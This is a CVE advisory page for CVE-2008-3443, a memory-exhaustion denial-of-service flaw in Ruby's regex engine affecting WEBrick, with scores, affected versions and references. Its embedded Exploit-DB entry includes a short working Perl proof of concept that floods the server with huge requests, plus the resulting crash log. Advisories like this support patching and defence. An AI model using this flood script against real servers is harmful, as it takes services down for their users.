CVE-2008-3443 : Detail

CVE-2008-3443

18.83%V3
Network
2008-08-14
21h00 +00:00
2018-10-03
18h57 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

The regular expression engine (regex.c) in Ruby 1.8.5 and earlier, 1.8.6 through 1.8.6-p286, 1.8.7 through 1.8.7-p71, and 1.9 through r18423 allows remote attackers to cause a denial of service (infinite loop and crash) via multiple long requests to a Ruby socket, related to memory allocation failure, and as demonstrated against Webrick.

CVE Informations

Related Weaknesses

CWE-ID Weakness Name Source
CWE-399 Category : Resource Management Errors
Weaknesses in this category are related to improper management of system resources.

Metrics

Metrics Score Severity CVSS Vector Source
V2 5 AV:N/AC:L/Au:N/C:N/I:N/A:P [email protected]

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 6239

Publication date : 2008-08-12 22h00 +00:00
Author : laurent gaffié
EDB Verified : Yes

------------------------------------------------------- Language : Ruby Web Site: www.ruby-lang.org Platform: All Bug: Remote Socket Memory Leak Products Affected: 1.8 series: - 1.8.5 and all prior versions - 1.8.6-p286 and all prior versions - 1.8.7-p71 and all prior versions 1.9 series - r18423 and all prior revisions Confirmed by the vendor: Yes Patch available : Yes ------------------------------------------------------- 1) Introduction 2) Bug 3) Proof of concept 4) Credits =============== 1) Introduction =============== "A dynamic, open source programming language with a focus on simplicity and productivity. It has an elegant syntax that is natural to read and easy to write." ======= 2) Bug ======= Ruby fails to handle properly the memory allocated for a socket So when you send ~ 4 big request to a ruby socket, ruby will go in infinite loop, and then crash. The bug reside in the regex engine (in regex.c). ================== 3)Proof of concept =================== This poc is an exemple for Webrick web server crap.pl : #!/usr/bin/perl use LWP::Simple; my $payload = "\x41" x 49999999; while(1) { print "[+]\n"; get "http://127.0.0.1:2500/".$payload.""; } Result (Exemple on Webrick web server): [2008-07-11 22:39:55] INFO WEBrick 1.3.1 [2008-07-11 22:39:55] INFO ruby 1.8.6 (2007-09-24) [i486-linux] [2008-07-11 22:39:55] INFO WEBrick::HTTPServer#start: pid=13850 port=2500 [2008-07-11 22:40:51] ERROR NoMemoryError: failed to allocate memory /usr/lib/ruby/1.8/webrick/httprequest.rb:228:in `read_request_line' /usr/lib/ruby/1.8/webrick/httprequest.rb:86:in `parse' /usr/lib/ruby/1.8/webrick/httpserver.rb:56:in `run' /usr/lib/ruby/1.8/webrick/server.rb:173:in `start_thread' /usr/lib/ruby/1.8/webrick/server.rb:162:in `start' /usr/lib/ruby/1.8/webrick/server.rb:162:in `start_thread' /usr/lib/ruby/1.8/webrick/server.rb:95:in `start' /usr/lib/ruby/1.8/webrick/server.rb:92:in `each' /usr/lib/ruby/1.8/webrick/server.rb:92:in `start' /usr/lib/ruby/1.8/webrick/server.rb:23:in `start' /usr/lib/ruby/1.8/webrick/server.rb:82:in `start' /home/audit/instiki-0.13.0/vendor/rails/railties/lib/webrick_server.rb:63:in `dispatch' script/server:62 [FATAL] failed to allocate memory root@audit:/home/audit# ===== 5)Credits ===== laurent gaffié laurent.gaffie{remove_this}[at]gmail[dot]com # milw0rm.com [2008-08-13]

Products Mentioned

Configuraton 0

Ruby-lang>>Ruby >> Version 1.6.8

    Ruby-lang>>Ruby >> Version 1.8.0

    Ruby-lang>>Ruby >> Version 1.8.1

    Ruby-lang>>Ruby >> Version 1.8.1

      Ruby-lang>>Ruby >> Version 1.8.2

      Ruby-lang>>Ruby >> Version 1.8.2

      Ruby-lang>>Ruby >> Version 1.8.2

      Ruby-lang>>Ruby >> Version 1.8.2

      Ruby-lang>>Ruby >> Version 1.8.3

      Ruby-lang>>Ruby >> Version 1.8.3

      Ruby-lang>>Ruby >> Version 1.8.3

      Ruby-lang>>Ruby >> Version 1.8.3

      Ruby-lang>>Ruby >> Version 1.8.4

      Ruby-lang>>Ruby >> Version 1.8.4

      Ruby-lang>>Ruby >> Version 1.8.4

      Ruby-lang>>Ruby >> Version 1.8.4

        Ruby-lang>>Ruby >> Version 1.8.5

        Ruby-lang>>Ruby >> Version 1.8.5

          Ruby-lang>>Ruby >> Version 1.8.5

            Ruby-lang>>Ruby >> Version 1.8.5

              Ruby-lang>>Ruby >> Version 1.8.5

                Ruby-lang>>Ruby >> Version 1.8.5

                  Ruby-lang>>Ruby >> Version 1.8.5

                    Ruby-lang>>Ruby >> Version 1.8.5

                      Ruby-lang>>Ruby >> Version 1.8.5

                        Ruby-lang>>Ruby >> Version 1.8.5

                          Ruby-lang>>Ruby >> Version 1.8.5

                          Ruby-lang>>Ruby >> Version 1.8.5

                          Ruby-lang>>Ruby >> Version 1.8.5

                          Ruby-lang>>Ruby >> Version 1.8.5

                          Ruby-lang>>Ruby >> Version 1.8.5

                          Ruby-lang>>Ruby >> Version 1.8.6

                          Ruby-lang>>Ruby >> Version 1.8.6

                            Ruby-lang>>Ruby >> Version 1.8.6

                              Ruby-lang>>Ruby >> Version 1.8.6

                                Ruby-lang>>Ruby >> Version 1.8.6

                                  Ruby-lang>>Ruby >> Version 1.8.6

                                    Ruby-lang>>Ruby >> Version 1.8.6

                                      Ruby-lang>>Ruby >> Version 1.8.6

                                      Ruby-lang>>Ruby >> Version 1.8.6

                                      Ruby-lang>>Ruby >> Version 1.8.6

                                      Ruby-lang>>Ruby >> Version 1.8.7

                                      Ruby-lang>>Ruby >> Version 1.8.7

                                      Ruby-lang>>Ruby >> Version 1.8.7

                                      Ruby-lang>>Ruby >> Version 1.8.7

                                      Ruby-lang>>Ruby >> Version 1.8.7

                                      Ruby-lang>>Ruby >> Version 1.8.7

                                      Ruby-lang>>Ruby >> Version 1.8.7

                                      Ruby-lang>>Ruby >> Version 1.8.7

                                      Ruby-lang>>Ruby >> Version 1.9.0

                                      Ruby-lang>>Ruby >> Version 1.9.0

                                        References

                                        http://secunia.com/advisories/31430
                                        Tags : third-party-advisory, x_refsource_SECUNIA
                                        https://usn.ubuntu.com/651-1/
                                        Tags : vendor-advisory, x_refsource_UBUNTU
                                        http://secunia.com/advisories/33185
                                        Tags : third-party-advisory, x_refsource_SECUNIA
                                        http://www.debian.org/security/2009/dsa-1695
                                        Tags : vendor-advisory, x_refsource_DEBIAN
                                        http://support.apple.com/kb/HT3549
                                        Tags : x_refsource_CONFIRM
                                        http://www.securityfocus.com/bid/30682
                                        Tags : vdb-entry, x_refsource_BID
                                        http://securityreason.com/securityalert/4158
                                        Tags : third-party-advisory, x_refsource_SREASON
                                        http://secunia.com/advisories/35074
                                        Tags : third-party-advisory, x_refsource_SECUNIA
                                        http://www.securitytracker.com/id?1021075
                                        Tags : vdb-entry, x_refsource_SECTRACK
                                        http://www.redhat.com/support/errata/RHSA-2008-0895.html
                                        Tags : vendor-advisory, x_refsource_REDHAT
                                        http://www.redhat.com/support/errata/RHSA-2008-0897.html
                                        Tags : vendor-advisory, x_refsource_REDHAT
                                        http://secunia.com/advisories/33398
                                        Tags : third-party-advisory, x_refsource_SECUNIA
                                        http://secunia.com/advisories/32219
                                        Tags : third-party-advisory, x_refsource_SECUNIA
                                        https://www.exploit-db.com/exploits/6239
                                        Tags : exploit, x_refsource_EXPLOIT-DB
                                        http://www.us-cert.gov/cas/techalerts/TA09-133A.html
                                        Tags : third-party-advisory, x_refsource_CERT
                                        http://www.vupen.com/english/advisories/2009/1297
                                        Tags : vdb-entry, x_refsource_VUPEN
                                        https://usn.ubuntu.com/691-1/
                                        Tags : vendor-advisory, x_refsource_UBUNTU
                                        http://secunia.com/advisories/32371
                                        Tags : third-party-advisory, x_refsource_SECUNIA
                                        http://secunia.com/advisories/32165
                                        Tags : third-party-advisory, x_refsource_SECUNIA
                                        http://secunia.com/advisories/32372
                                        Tags : third-party-advisory, x_refsource_SECUNIA